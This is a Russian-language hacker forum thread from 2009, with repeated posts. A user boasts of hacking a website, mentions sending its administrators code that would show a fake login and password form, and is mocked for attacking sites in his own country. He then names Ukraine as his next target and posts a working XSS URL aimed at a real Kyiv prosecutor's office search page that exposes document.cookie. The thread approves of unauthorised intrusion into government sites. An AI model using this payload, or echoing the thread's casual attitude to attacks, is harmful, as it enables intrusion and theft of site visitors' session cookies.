Я думаю если всё что там на сайде намутили, вернуть как было, и забыть туда дорогу, то всё буит норм....
Я написал письмо администрации отправил код если они закинут код в ту папку ну а с администрационого индекса пропишут инклюд при клике будет выходит форма ввода логина и пароля . Ну а так не думаю чтоб кто то за мною гнался (если вот сайт прокуратуры московской области взломал то тогда был бы пипец )
Я написал письмо администрации отправил код если они закинут код в ту папку ну а с администрационого индекса пропишут инклюд при клике будет выходит форма ввода логина и пароля . Ну а так не думаю чтоб кто то за мною гнался (если вот сайт прокуратуры московской области взломал то тогда был бы пипец )
ты дурак полний!каждий первий школьник знает что для начала надо ламать закордонние сайти,а потом если есть опит то мoжна приступать к своим.а ты сразу начал с своей страни,тем болие с такого сайта!
ты дурак полний!каждий первий школьник знает что для начала надо ламать закордонние сайти,а потом если есть опит то мoжна приступать к своим.а ты сразу начал с своей страни,тем болие с такого сайта!
Каждый первый школьник знает, что на ачате ему делать нех, так что тебе найух.
а кто тебе сказал что это мой первый сайт ? (и вообще это самый простой взлом .взлом за 2 минуты .)
Последний раз редактировалось games.daemon; 13.09.2009 в 16:22..
да вот подумав решил нах мне своих ломать ! переходим на Украину на Киев
http://www.prokuror.kiev.ua/ua/search?query="><script>alert(document.cookie)<%2Fs cript>
сразу хсс мне попал в руки
Последний раз редактировалось games.daemon; 13.09.2009 в 16:45..
да вот подумав решил нах мне своих ломать ! переходим на Украину на Киев
http://www.prokuror.kiev.ua/ua/search?query="><script>alert(document.cookie)<%2Fs cript>
сразу активный хсс мне попал в руки